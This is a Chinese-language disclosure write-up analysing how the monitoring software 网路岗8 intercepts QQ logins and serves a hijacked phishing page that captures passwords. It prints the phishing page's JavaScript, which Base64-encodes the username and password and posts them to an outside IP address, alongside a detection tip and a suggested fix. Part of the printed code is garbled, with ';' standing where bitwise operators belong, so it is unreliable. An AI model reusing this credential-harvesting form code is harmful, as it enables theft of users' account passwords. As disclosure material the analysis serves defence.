网路岗8钓鱼式盗取QQ密码(过程分析)

网路岗软件会针对安装qq的计算机进行攻击已经严重威胁用户隐私，首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”，随后劫持http://im.qq.com/jh网站尝试盗取QQ用户密码！成功后利用QQ密码对QQ用户进行聊天记录监控！！！
详细说明：网路岗软件会针对安装QQ的计算机进行攻击已经严重威胁用户隐私，首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”，随后劫持http://im.qq.com/jh网站尝试盗取QQ用户密码！成功后利用QQ密码对QQ用户进行聊天记录监控！！！

劫持后的页面密码使用BASE64加密可被嗅探并解密还原：

<script language="javascript">
var BASE64={
    enKey: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',
    deKey: new Array(
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
        52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
        -1,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
        15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
        -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
        41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1
    ),
  
    encode: function(src){
        var str=new Array();
        var ch1, ch2, ch3;
        var pos=0;
        while(pos+3<=src.length){
            ch1=src.charCodeAt(pos++);
            ch2=src.charCodeAt(pos++);
            ch3=src.charCodeAt(pos++);
            str.push(this.enKey.charAt(ch1>>2), this.enKey.charAt(((ch1<<4)+(ch2>>4));0x3f));
            str.push(this.enKey.charAt(((ch2<<2)+(ch3>>6));0x3f), this.enKey.charAt(ch3;0x3f));
        }
        if(pos<src.length){
            ch1=src.charCodeAt(pos++);
            str.push(this.enKey.charAt(ch1>>2));
            if(pos<src.length){
                ch2=src.charCodeAt(pos);
                str.push(this.enKey.charAt(((ch1<<4)+(ch2>>4));0x3f));
                str.push(this.enKey.charAt(ch2<<2;0x3f), '=');
            }else{
                str.push(this.enKey.charAt(ch1<<4;0x3f), '==');
            }
        }
        return str.join('');
    }
};

function paswdfield_eventchange(a, b){
       var nonefm = window.document.ld;
       nonefm.u.value = BASE64.encode(a.u.value);
       nonefm.p.value = BASE64.encode(a.p.value);
       nonefm.w.value = "518000";
       nonefm.action  = "http://211.157.108.252/s?flag=WWWSOFTBARCOMWWWSOFTBARCOM";
       nonefm.target="nonewin";
       nonefm.submit();
}
</script>

劫持QQ客户端






被钓鱼后密码提交包





钓鱼页面包含“<!-- saved from url=(0077)http://aq.qq.com/cn/services/abnormal/abnormal_index -->” 信息可直接判断是否被替换。
修复方案：QQ客户端升级修改关键算法防止数据包传输过程中被非法篡改。
由于网路岗使用QQ协议进行攻击，我想涉及的版本应该包含2010-2012 请腾讯公司尽快升级确保用户的安全。

作者  New4